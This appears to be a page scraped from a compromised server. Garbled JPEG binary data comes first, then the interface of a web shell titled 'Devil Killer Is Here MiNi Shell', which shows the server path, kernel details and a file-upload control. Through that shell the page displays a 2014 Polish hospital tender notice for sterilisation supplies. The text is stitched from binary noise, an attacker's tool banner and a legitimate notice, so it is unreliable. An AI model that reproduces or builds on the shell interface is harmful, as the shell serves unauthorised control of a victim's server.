JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141007/331736-N-2014.html

<p class="kh_header"><b>Włocławek: ZP/67/2014 Dostawa materiałów sterylizacyjnych</b><br>
<b>Numer ogłoszenia: 331736 - 2014; data zamieszczenia: 07.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/67/2014 Dostawa materiałów sterylizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów sterylizacyjnych dla Wojewódzkiego Szpitala Specjalistycznego im. błogosławionego księdza Jerzego Popiełuszki we Włocławku przez okres 24 miesięcy licząc od dnia zawarcia umowy w następującym asortymencie :

Zadanie nr 1 
L.p.	Nazwa produktu	J.m.	 Ilość sztuk na 24 miesiące
1.	Rękaw papierowo-foliowy 50mm x 200m	rolka	55
2.	Rękaw papierowo - foliowy 75mm x 200m	rolka	96
3.	Rękaw papierowo - foliowy 100 mm x 200m	rolka	140
4.	Rękaw papierowo - foliowy 120 mm x 200m	rolka	160
5.	Rękaw papierowo - foliowy  150mm x 200m	rolka	55
6.	Rękaw papierowo - foliowy 200mm x 200m	rolka	100
7.	Rękaw papierowo - foliowy 250 mm x 200m	rolka	55
8.	Rękaw papierowo -foliowy 300mm x 200m	        rolka	32
9.	Rękaw papierowo- foliowy z zakładką  
300mm x 80mm x 100m	rolka	50

WYMAGANIE dot. zadania nr 1: 

Rękawy papierowo-foliowe - pozycja od 1- 9 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC:o wyrobach medycznych.  
Znak CE umieszczony na opakowaniu zbiorczym zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych ( Dz.U. nr 107, poz. 679 ).
Papier o gramaturze 60-70g/m2.zgodny z normą PN EN 868-3:2001 ;Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji papier stosowany do wytwarzania torebek papierowych i do wytwarzania torebek i rękawów. Wymagania i metody badań;  
Folia z testem do sterylizacji parowej i tlenkiem etylenu co najmniej pięciowarstwowa nie licząc warstwy kleju, ocena parametrów wytrzymałościowych wydana przez producenta folii (a nie dystrybutora) zgodna z normami  PN EN 868-5:2001;Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych, przeznaczonych do sterylizacji. Torebki zgrzewalne i z zamknięciem samoprzylepnym oraz rękawy papierowo-foliowe. Wymagania i metody badań.: 
Wszystkie napisy i testy poza przestrzenią roboczą, dopuszcza się wskaźniki wzdłuż zgrzewu.
Jednoznacznie oznaczony kierunek otwierania wyłącznie od strony papieru na linii zgrzewu fabrycznego.
Rękawy ze względów techniczno-higienicznych nawinięte na rolkę folią na zewnątrz.

Zadanie nr 2
Lp.	Nazwa produktu	J.m.	 Ilość arkuszy  na 24 miesiące
1.	Papier krepowany biały/zielony 600mm x 600mm	1 arkusz	12500
2.	Papier krepowany biały/zielony 750 x 750mm	1 arkusz	8500
3.	Papier krepowany biały/zielony 1000 x 1000mm	1 arkusz	23750
4.	Włóknina zielona                    1000x1000mm	1 arkusz	14500
5.	Maty absorpcyjne do wykładania tac narzędziowych 750 x 750mm	1 arkusz	1100

WYMAGANIE dot. zadania nr 2: 

Papier sterylizacyjny - pozycja 1-3 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Charakterystyka wytrzymałościowa wydana przez producenta papieru sterylizacyjnego w celu potwierdzenia i oceny parametrów wytrzymałościowych, gramatury nominalnej papieru 60 g/m2  przy niskiej zawartości chlorków i siarczanów nie więcej niż 0,02%.
Zgodny z normą PN EN 868-2.: Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji. Wymagania i metody badań.;
Włókno celulozowe, kolor zielony i biały.
Włóknina sterylizacyjna - pozycja 4 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Charakterystyka wytrzymałościowa wydana przez producenta w celu potwierdzenia i oceny parametrów wytrzymałościowych o gramaturze nominalnej 66 g/m2 ? 5% zawartości chlorków i siarczanów nie więcej niż 0,01 %,
Zgodność z normą PN EN 868-2. .: Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji. Wymagania i metody badań.;
Włóknina sterylizacyjna III generacji - celuloza wiązana powierzchniowo wzmocniona włóknem syntetycznym, mikrokrepowana, uszczelniona lateksem.
Mata absorpcyjna - pozycja 5
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Papier medyczny z warstwą absorpcyjną do stosowania pod tacę narzędziową celem osłonięcia ostrych krawędzi i zapewnienia szybkiego pochłaniania wilgoci podczas parowych cykli sterylizacji do jednorazowego użytku. 

Zadanie nr 3
Lp.	Nazwa towaru	J.m.	Ilość opakowań  na 24 miesiące
1.	Wskaźnik biologiczny fiolkowy do tlenku etylenu	1op./100fiolek.	8
2.	Fiolkowe wskaźniki biologiczne o szybkim odczycie do pary wodnej 	1op./100fiolek	13

WYMAGANIE dot. zadania nr 3: 

Wskaźnik biologiczny fiolkowy do tlenku etylenu - pozycja 1
Odpowiadający normie PN EN ISO11138-2: 2011P Sterylizacja produktów stosowanych w  ochronie zdrowia Wskaźniki biologiczne dla procesów sterylizacji tlenkiem etylenu
Ostateczny odczyt wskaźnika po 48 godzinach inkubacji.
Fiolkowe wskaźniki biologiczne o szybkim odczycie do pary wodnej - pozycja 2 
Odpowiadające normie PN EN ISO 11138-1:2008P Sterylizacja produktów stosowanych w ochronie zdrowia. Wymagania ogólne.
Kompatybilne z inkubatorem marki Terragene.
Ostateczny odczyt wskaźnika biologicznego po 3h.
Etykieta na fiolce wskaźnika biologicznego podczas procesu sterylizacji powinna w widoczny sposób zmienić zabarwienie.
Naklejka nierwąca, przylepna co umożliwia umieszczenie jej w dokumentacji.

Zadanie nr 4 
Lp.	Nazwa towaru	J.m.	Ilość  na 24 miesiące
1.	Wskaźnik wieloparametrowy do tlenku etylenu odpowiadający klasie 4 	1op./500szt.	70
2.	Wskaźnik wieloparametrowy do pary klasy 4	1op./500szt.	65
3.	Wskaźnik kontroli procesu odpowiadający klasie 6 lub 5 do pary z przyrządem testowym procesu sterylizacji PCD 	1op./ 250szt.	23
4.	Jednorazowy pakiet typu Bovie - Dick	Pakiet 1 szt.	1900
5.	Taśma testowa wskaźnikowa do pary szer.19x50  mb.	1rolka 50 m	650
6	Taśma neutralna szer.19 mm	1 rolka 50 m	760

WYMAGANIE dot. zadania nr 4: 

Wieloparametrowy wskaźnik do tlenku etylenu klasy 4 - pozycja  1
Odpowiada normie PN EN ISO 11140 -1: 2011P.Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne.
Nietoksyczny, nie zawiera ołowiu i substancji szkodliwych.
Podwójny pasek testowy z równolegle rozłożoną substancją wskaźnikową, w widoczny sposób zmieniający barwę podczas procesu sterylizacji. 
Wieloparametrowy wskaźnik do pary klasy 4 - pozycja 2 
Odpowiada normie PN EN ISO 11140 -1: 2011P. .Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne.
Nietoksyczny, nie zawiera ołowiu i substancji szkodliwych. 
Podwójny pasek testowy z równolegle rozłożoną substancją wskaźnikową na środku
perforowany w widoczny sposób zmieniający barwę podczas procesu sterylizacji. 
Wskaźnik kontroli procesu sterylizacji parowej z przyrządem procesu sterylizacji PCD - pozycja 3 
Test wsadu składający się z przyrządu testowego procesu sterylizacji i przystosowanych do niego testów klasy 6 lub 5. Testy chemiczne odpowiadające normie PN EN ISO 11140-1:2011P Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne. Kontrola sterylizacji parą wodną w autoklawach próżniowych w cyklu 134oC/7min i 121oC/20min.  
Symuluje niekorzystne warunki sterylizacji, aby dokładnie kontrolować penetrację pary oraz zachowanie wszystkich parametrów danego cyklu,  w najtrudniej dostępnych miejscach sterylizowanego wsadu.
Testy podczas procesu sterylizacji  w widoczny sposób zmieniające barwę, nietoksyczne, bez zawartości ołowiu i substancji szkodliwych.
Przyrząd PCD kompatybilny z testem klasy 6 lub 5. 
Jednorazowy pakiet Bovie-Dick - pozycja 4
Kontroluje penetrację i jakość pary, symulując ładunek porowaty.
Potwierdzenie zgodności normą PN EN ISO 11140-3: 2011P. Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne. Systemy wskaźnikowe Klasy 2 do stosowania w teście penetracji pary wodnej typu Boviego -.Dicka.
Pakiet jednorazowy nietoksyczny w widoczny sposób zmieniający barwę podczas procesu sterylizacji.
Cykl  Bovie-Dicka w zakresie 1340C /3,5 min i 1210C/15 min.
Taśma wskaźnikowa  - pozycja 5  
Taśma ze wskaźnikiem do sterylizacji parą wodną  wymagana charakterystyka producenta.
Taśma neutralna - pozycja 6
Taśma maskująca, zabezpieczająca zestawy narzędzi przed otwarciem.

Zadanie nr 5
Lp.	Nazwa produktu	J.m.	 Ilość  na 24 miesiące
1.	Etykiety podwójnieprzylepne bez wskaźnika procesu z miejscami informacyjnymi do metkownicy BLITZ	rol.	1050
2.	Koperty dokumentacyjne przystosowane do etykiet	szt.	660
3.	Rolka zapasowa z tuszem do metkownicy BLITZ	szt.	14

WYMAGANIE dot. zadania nr 5 : 
Etykiety podwójnie przylepne - pozycja 1
Przeznaczone do oznaczania pakietów po procesie sterylizacji.
Napisy w języku polskim. 	
Podwójnie przylepne.
Etykiety pozbawione testu procesu sterylizacji.
Pięć pól zapisywania do trzyrzędowej metkownicy BLITZ.
Koperty dokumentacyjne - pozycja 2
Koperty drukowane jednodniowe w języku polskim z przygotowanymi do wypełnienia polami zawierającymi najistotniejsze dla dokumentacji informacje oraz miejscami do wklejania etykiet.
Rolki zapasowe z tuszem - pozycja 3
Zapasowa rolka z tuszem do metkownicy BLITZ

Zadanie nr 6
Lp.	Nazwa produktu	J.m.	Ilość sztuk na 24 miesiące
1.	Naboje do aparatu STERI-VAC  5XLP	 szt.	732

WYMAGANIE dot. zadania nr 6 : 

Naboje do aparatu STERI-VAC 5XLP - pozycja 1
Naboje zawierające 100g czystego tlenku etylenu opiniowane i dopuszczone do użytku z gwarancją efektywności bakteriobójczej, kompatybilne z aparatem STERI-VAC 5XLP.

 Zadanie nr 7
Lp.	Nazwa produktu	J.m.	Ilość sztuk  na 24 miesiące
1.	Osłonki na igły	szt.	1200

WYMAGANIE dot. zadania nr 7 : 

Osłonki na igły - pozycja 1
Zabezpieczenie ostrych delikatnych narzędzi igieł sond, wkłuć.

Zadanie nr 8
Lp.	Nazwa produktu	J.m.	Ilość sztuk  na 24 miesiące
1.	Przeźroczyste osłonki na ostrza szer. 15mm	szt.	3600
2.	Przeźroczyste osłonki na ostrza szer.30mm	szt.	3600

WYMAGANIE dot. zadania nr 8 : 

Przeźroczyste osłonki na ostrza - pozycja 1 i 2
Zabezpieczenie końcówek i ostrzy narzędzi z możliwością wizualnej identyfikacji poprzez przeźroczystą osłonę.

Uwaga:

1.   Nie dopuszcza się składania ofert wariantowych. 
2.  Dopuszcza się składanie ofert częściowych na poszczególne zadania. Poprzez ofertę częściową Zamawiający rozumie: ofertę zawierającą wszystkie pozycje w zadaniu - dotyczy  zadania nr 1,2,3,4,5,8.
3.  Przedmiot zamówienia ma być dostarczony w opakowaniu producenta.
4. Wykonawca będzie dostarczał towar oznakowany na opakowaniach z następującymi danymi: nazwa towaru, ilość, data produkcji, data ważności do użytku, producent.
5. Zamawiający wymaga dokonania każdej dostawy przedmiotu zamówienia w terminie 2 dni roboczych: od poniedziałku do piątku od daty złożenia zamówienia przez Zamawiającego telefonicznie, faksem lub mailem - przechowywanym przez miesiąc od czasu uzyskania prawidłowo zrealizowanego zamówienia.
6. Wykonawca musi zagwarantować dostępność oferowanego przedmiotu zamówienia przez 
cały okres obowiązywania umowy.
7.  Zamawiający zastrzega, że podane w opisie przedmiotu zamówienia (załącznik nr 2A,2B,2C,2D,2E,2F,2G,2H do siwz) przewidywane zapotrzebowanie ( podane ilości ) nie stanowią ilości gwarantowanych przez Zamawiającego, bowiem faktyczny zakres zamówień składanych przez Zamawiającego w czasie obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania o udzielenie zamówienia publicznego uzależniony będzie od potrzeb Zamawiającego związanych z udzielaniem świadczeń zdrowotnych. Jednakże zmniejszenie ilości asortymentu podanych w załączniku nr 2A,2B,2C,2D,2E,2F,2G,2H  nie przekroczy 20% ilości przewidywanej w załączniku nr 2A,2B,2C,2D,2E,2F,2G,2H  dla danego zadania.
8. Dostarczony przedmiot zamówienia winien być zaopatrzony w etykietę handlową sporządzoną w języku polskim, zawierającą niezbędne informacje potrzebne do bezpiecznego używania dla bezpośredniego użytkownika. Jeśli oryginalna dokumentacja jest sporządzona w innym języku, to Wykonawca dostarczy wraz z oryginałem tłumaczenie na język polski..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.77.20.00-2, 19.73.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę do każdego z zadań w zakresie dostawy materiałów sterylizacyjnych o wartości minimum PLN brutto:

Zadanie nr 1	 40.000,00 PLN	Zadanie nr 5	 15.000,00 PLN
Zadanie nr 2	 30.000,00 PLN	Zadanie nr 6	 15.000,00 PLN
Zadanie nr 3	 10.000,00 PLN	Zadanie nr 7	      400,00 PLN
Zadanie nr 4	 20.000,00 PLN	Zadanie nr 8	   2.000,00 PLN

w ramach jednego kontraktu - odpowiednio w każdym zadaniu. W przypadku gdy Wykonawca składa ofertę na kilka zadań, Zamawiający dopuszcza wykazanie się przez Wykonawcę jedną dostawą w ramach jednego kontraktu na wartość równą lub wyższą od sumy wartości wskazanych w ww. warunku obliczonych dla danych zadań.
Np. w przypadku gdyby Wykonawca składał ofertę na zadanie nr 2, zadanie nr 5 i zadanie nr 8 to może wykazać się doświadczeniem w wykonaniu co najmniej 1 dostawy w ramach jednego kontraktu na wartość co najmniej 47 tys. PLN brutto. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie dokumentu wykazu wykonanych, a w przypadku świadczeń okresowych i ciągłych, również wykonywanych dostaw w zakresie dostaw objętych przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (zał. nr 6 do siwz) oraz dowodów, czy zostały wykonane lub są wykonywane należycie oraz oświadczenia Wykonawcy ( zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 

Oceny spełniania tego warunku Zamawiający dokona na podstawie Oświadczenia Wykonawcy (zał. nr 3 do siwz ) wg reguły spełnia/ nie spełnia. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

W przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych podmiotów zamawiający żąda dokumentów określających:
a/  zakres dostępnych Wykonawcy zasobów innego podmiotu,
b/ sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c/ charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d/ zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Wszystkie warunki wymienione w pkt. III. 3) muszą być spełnione łącznie. Zamawiający dokona wyboru oferty spośród ofert niepodlegających odrzuceniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wymagania do przedmiotu zamówienia i ważne dokumenty na potwierdzenie ich spełnienia: 
Wymaganie nie dotyczy zadania nr 5, 7, 8	
I. 	
